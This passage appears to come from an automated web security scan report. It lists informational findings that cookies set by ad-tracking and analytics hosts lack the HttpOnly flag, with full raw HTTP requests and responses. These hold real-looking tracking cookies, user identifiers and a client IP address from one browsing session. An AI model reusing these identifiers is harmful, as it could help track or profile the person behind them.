Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:11 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:32:58 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:32:58 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Set-Cookie: _curtime=1305207178; domain=pubmatic.com; expires=Thu, 12-May-2011 14:42:58 GMT; path=/
Set-Cookie: pubfreq_25277_19976_856941671=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:12:58 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Content-Length: 1486

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9932717481735209|cb=1305207191|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
9.92. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.examiner.com
Path:   /b/ss/examinercom/1/H.21/s24557034953031

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/examinercom/1/H.21/s24557034953031?AQB=1&ndh=1&t=12/4/2011%208%3A30%3A37%204%20300&ce=ISO-8859-1&ns=examinercom&pageName=Examiner%20Article&g=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&cc=USD&ch=Sports&server=192.168.1.55&events=event4%2Cevent15%2Cevent5&c1=Fight%20Sports&h1=National%3ASports%3AFight%20Sports%3AFight%20Sports&c4=ARTICLE%20EXENTRY%3A33045071&v4=ARTICLE%20EXENTRY%3A33045071&c5=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20%27face%27%20and%20new%20feuds&v5=National&c6=Rick%20Rockwell&v6=National&c7=EXID%3A21442%20Fight%20Sports%20Examiner&c8=EXID%3A21442&c9=11&c10=National&c11=National&v11=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c12=story&c13=y2011m05d11&c14=Fight%20Sports&v16=7%3A00AM&c17=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&v17=Thursday&c18=7%3A00AM&v18=Weekday&c19=Thursday&c20=Weekday&c21=First%20Visit&c22=Fight%20Sports%20Examiner&c23=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c24=1501231&c25=National&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: stats.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXAMINEREDITION=921; __utmz=109783377.1305207036.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109783377.2080855934.1305207036.1305207036.1305207036.1; __utmc=109783377; __utmb=109783377.1.10.1305207036; s_cc=true; s_visit=1; s_lv=1305207037528; s_lv_s=First%20Visit; s_dlv=First%20Visit

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5F0A8051D189A-40000126E0002357[CE]; Expires=Tue, 10 May 2016 13:32:00 GMT; Domain=.examiner.com; Path=/
Location: http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031?AQB=1&pccr=true&vidn=26E5F0A8051D189A-40000126E0002357&&ndh=1&t=12/4/2011%208%3A30%3A37%204%20300&ce=ISO-8859-1&ns=examinercom&pageName=Examiner%20Article&g=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&cc=USD&ch=Sports&server=192.168.1.55&events=event4%2Cevent15%2Cevent5&c1=Fight%20Sports&h1=National%3ASports%3AFight%20Sports%3AFight%20Sports&c4=ARTICLE%20EXENTRY%3A33045071&v4=ARTICLE%20EXENTRY%3A33045071&c5=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20%27face%27%20and%20new%20feuds&v5=National&c6=Rick%20Rockwell&v6=National&c7=EXID%3A21442%20Fight%20Sports%20Examiner&c8=EXID%3A21442&c9=11&c10=National&c11=National&v11=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c12=story&c13=y2011m05d11&c14=Fight%20Sports&v16=7%3A00AM&c17=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&v17=Thursday&c18=7%3A00AM&v18=Weekday&c19=Thursday&c20=Weekday&c21=First%20Visit&c22=Fight%20Sports%20Examiner&c23=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c24=1501231&c25=National&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 13:32:00 GMT
Last-Modified: Fri, 13 May 2011 13:32:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www255
Content-Length: 0
Content-Type: text/plain

9.93. http://statse.webtrendslive.com/dcshk2h3ouz5bdzhx6ilj0lvi_2m1v/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcshk2h3ouz5bdzhx6ilj0lvi_2m1v/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcshk2h3ouz5bdzhx6ilj0lvi_2m1v/dcs.gif?&dcsdat=1305206944403&dcssip=mashable.com&dcsuri=/2011/05/11/google-chrome-notebooks/&WT.tz=-5&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Google%20Chrome%20OS%20Notebooks%20Available%20June%2015&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1020x950&WT.fv=10.2&WT.slv=Unknown&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=mashable.com/2011/05/11/google-chrome-notebooks/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vtvs=1305206944405&WT.vtid=173.193.214.243-1124471968.30145892&WT.co_f=173.193.214.243-1124471968.30145892&WT.z_postDate=2011.m05.d11&WT.z_postAge=1&WT.z_dMask=2010101000010&WT.z_author=Ben%20Parr HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAQAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AADdFv003Rb9Nf8kAADRUv00zVL9NI8sAAF5Vv01AVL9NPKoAAF3Xv00A179N86YAAIDbv01M179NutAAAKLvyk2g78pNDgAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAAA3Rb9NN0W/TRpKAABeVb9NM1S/Te1BAACA279NANe/TXpLAACi78pNoO/KTQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Thu, 12 May 2011 13:31:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcshk2h3ouz5bdzhx6ilj0lvi_2m1v/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1305206944403&dcssip=mashable.com&dcsuri=/2011/05/11/google-chrome-notebooks/&WT.tz=-5&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Google%20Chrome%20OS%20Notebooks%20Available%20June%2015&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1020x950&WT.fv=10.2&WT.slv=Unknown&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=mashable.com/2011/05/11/google-chrome-notebooks/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vtvs=1305206944405&WT.vtid=173.193.214.243-1124471968.30145892&WT.co_f=173.193.214.243-1124471968.30145892&WT.z_postDate=2011.m05.d11&WT.z_postAge=1&WT.z_dMask=2010101000010&WT.z_author=Ben%20Parr
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAARAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AADdFv003Rb9Nf8kAADRUv00zVL9NI8sAAF5Vv01AVL9NPKoAAF3Xv00A179N86YAAIDbv01M179NutAAAKLvyk2g78pNwQkBADPhy00z4ctNDwAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAAA3Rb9NN0W/TRpKAABeVb9NM1S/Te1BAACA279NANe/TXpLAACi78pNoO/KTfxQAAAz4ctNM+HLTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

9.94. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=4&mt_ec=64ws&mt_exuid=CAESEI7AtohZAB1uVQGOsNXUkdI&cver=1 HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTWpsRk5ETkVPRVl0TlRKRE5TMDBRemRDTFVJeVJVRXRNREU0TVRRNU5rVTJOamN4L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NDAwNDk4MTEwMzk2MTYzNS8xMTUwMDMvMTAwNDcwLzMvUTNBbV9DbnBmUVVnTncyOVZSNGhUbWpqa0w0WkZVdDFnbUFFWWRJanE0RS8/HmZsFV1ZVDb6VABVBJjTE0kobiw&price=3.5500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207080
If-None-Match: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2217 8727
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:34:01 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1305207241; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:34:01 GMT
Set-Cookie: mt_mop=4:1305207241; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:34:01 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
9.95. http://t.invitemedia.com/track_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?auctionID=13052070721588565-93912&pubICode=2083508&ckieName=33x_ps&crID=93912&campID=90206&cost=3.2143&partnerID=38&pub=369335&partner_uid=u%253D7527692047%253As1%253D1303122295815%253Ats%253D1305126977891%253As2.33%253D%252C8131%252C4401%252C2751%252C8801%252C8261%252C6571%252C3831%252C7051%252C7651%252C6561%252C7661%252C2740%252C4411%252C9221%252C7671%252C9241%252C8151%252C5481%252C9232%252C571%252C6581%252C8282%252C8771%252C7621%252C8291%252C6531%252C8301%252C8171%252C2231%252C8781%252C4381%252C3321%252C7101%252C8311%252C8791%252C5451%252C8181%252C4911%252C7641%252C5441%252C2811%252C3761%252C7591%252C5911%252C2801%252C4472%252C7111%252C3771%252C5431%252C7131%252C1051%252C3202%252C5421%252C4451%252C6651%252C4461%252C5411%252C7121%252C8761%252C2791%252C5891%252C6641%252C4941%252C8101%252C8711%252C581%252C8231%252C3741%252C5941%252C7561%252C8111%252C7141%252C4441%252C1061%252C591%252C7161%252C2761%252C8241%252C6621%252C4421%252C5391%252C8721%252C4431%252C601%252C3241%252C5921%252C3721%252C8121%252C7581%252C5381%252C5021%252C3161%252C3711%252C7531%252C8391%252C8001%252C5012%252C7521%252C6111%252C5601%252C6931%252C7541%252C6091%252C6941%252C6461%252C8041%252C5591%252C6951%252C6131%252C8431%252C5051%252C3192%252C6411%252C8421%252C4501%252C6961%252C8061%252C4492%252C6421%252C6121%252C7511%252C4481%252C5581%252C8051%252C3171%252C6431%252C2571%252C6971%252C8331%252C6501%252C5552%252C5081%252C201%252C6981%252C2141%252C8871%252C8321%252C6511%252C6991%252C7461%252C4592%252C6041%252C5071%252C7961%252C4581%252C7001%252C8881%252C8341%252C5061%252C6471%252C7011%252C6071%252C231%252C2651%252C5111%252C7971%252C6051%252C7031%252C6481%252C5512%252C7991%252C6491%252C8851%252C6331%252C7891%252C2441%252C3521%252C4071%252C2981%252C8541%252C6321%252C5221%252C9081%252C7901%252C3541%252C8512%252C2461%252C9061%252C7881%252C3551%252C6791%252C2452%252C8522%252C7381%252C7921%252C4101%252C5192%252C6841%252C5731%252C7931%252C2951%252C9051%252C6291%252C7391%252C3561%252C8551%252C4051%252C6281%252C2491%252C2971%252C7361%252C5211%252C3571%252C4671%252C2481%252C3581%252C7373%252C4062%252C5751%252C2961%252C7831%252C341%252C7351%252C9011%252C8471%252C4681%252C6391%252C9021%252C2501%252C4691%252C6862%252C3071%252C5181%252C7811%252C5171%252C7821%252C3481%252C4031%252C6851%252C6371%252C7341%252C9001%252C3491%252C7861%252C5131%252C6361%252C4711%252C8501%252C7321%252C5121%252C7871%252C8991%252C3501%252C6901%252C8481%252C4721%252C7301%252C7841%252C5151%252C3511%252C5682%252C361%252C7851%252C5141%252C8971%252C5351%252C8671%252C7771%252C4751%252C2311%252C7291%252C4271%252C9212%252C2851%252C5831%252C9202%252C8661%252C4741%252C951%252C6201%252C7281%252C6661%252C4281%252C2871%252C5842%252C4761%252C6181%252C5361%252C8641%252C6191%252C7751%252C7261%252C6711%252C8701%252C5861%252C921%252C7792%252C6171%252C9171%252C5871%252C3911%252C5321%252C4771%252C8691%252C7251%252C9161%252C5332%252C4251%252C6691%252C8682%252C6151%252C431%252C4791%252C6701%252C5881%252C421%252C7781%252C2841%252C9151%252C8601%252C7711%252C3881%252C3341%252C4801%252C7701%252C5771%252C7221%252C5781%252C4351%252C6721%252C9131%252C2932%252C6241%252C7691%252C8591%252C4341%252C5791%252C2941%252C5311%252C7681%252C3351%252C451%252C9122%252C6732%252C3891%252C6771%252C5251%252C3851%252C3362%252C9111%252C6232%252C5261%252C8631%252C5801%252C3841%252C7191%252C971%252C3871%252C9101%252C5811%252C7181%252C2901%252C5271%252C6211%252C7721%252C3390%252C7171%252C961%252C4311%252C6761%252C5821%252C3861%252C9091%252C&url=http%3A%2F%2Fadserving2.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D300x250%26section%3D1588565 HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?gk8AAFU9GAAOhIEAAAAAAN17IwAAAAAAAAAAAAIAAAAAABAAAwAFCRQ-JgAAAAAAtMofAAAAAAAuiC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-1w8AAAAAAAIAAwAAAAAAPwrXo3A9.j8Mk6mCUUkDQDQzMzMzMwlA30-Nl24SEEBv27Zt27YJQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABtGq5ymMUUCtIQTrGgNDqaPlUrqNI4RJlXze4DAAAAAA==,,http%3A%2F%2Fadserving2.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D300x250%26section%3D1588565,Z%3D300x250%26anmember%3D541%26anprice%3D300%26s%3D1588565%26_salt%3D2649311919%26B%3D10%26r%3D0,15c8eadc-7c9c-11e0-a0b7-07e40bfd5098
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; dp_rec="{\"1\": 1304954972+ \"3\": 1305125819+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; camp_freq_p1="eJzjkuG48plFgFli68lV71gUGDU+gmgDRgswn0uG4xVY9thxiOy5qxBZMJ9LgmP+YlYBRommzqVg2aZ/J4GyDBYMQJnpH5mBMgc6IDIHPm6By/xdBNLzpQ0i8+U3TI8IR8dGkMyqVpAMgwYDWFSY440zUPDW/yVIgiIcK8+yAp31+wuq6BSgKJPECzTRCx+YgKKPJyxAEf3+DeTA/8/mo4jOvgESfY4meu8AyNwtF369RRZdMR/k3Ml9p1FEd94HmTBr/lqEKADut2xQ"; io_freq_p1="eJzjkuY4HijAJrH15Kp3LAqMGh9BtAGTxbHjQJpLmONNqACjRFPnUqAkgwaDAYMFA1DwqytQ8EAHquATkMovbaiCXeFAwVWtqIIvhYGCt/4vQRG8GiHALPH7C6rgmkgBJokXaIK7rYGCjycsQBFc4AIU/P9sPorgeleg4JYLv94iC24DuXNy32kUwb0uQMFZ89ciBAEFMUmn"; segments_p1="eJwdUM1KAlEYZe6dxeWu5iF6g14jAnVRD+GuJ+gHG7GghIygoB5AcCBEGx0rLDMzFVoFRcH0n2OrciFO59zN4Xw/55zvXi1VIalttdaVWqrDFOAijdpdl1qrWiCdz1ovstHJvwjgWc4ChoGF6aQsHP/t1UxboYB0ugC6BamtfjvE/TFF0Sn5pEXMugxqK9CDMTXbM7CqIujhvgkroTi6CqmrHlEx2GSkW+Hy8iLgNg3o8MrKCUcrGWJ9ROxiWardWdCvY3q8+8yLEgBvCfXQp2fb3JUfUrJnzvAYuxqzfelREs/R2jTiG2qevmn9kwD9CNjeMA+99vlT5aJwSs/BiH8R9mnb2+G0/8fN8yYj3CSglEKdy9BqysjHLMMa83xonVt3pMWG9Q/+LG7L"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 13:33:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 13:33:38 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"610341\": [1305207238+ \"b0014c6f-2597-3289-8efa-b52a4d357226\"+ 12208+ 58117+ 83]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"593713\": [1304954981+ 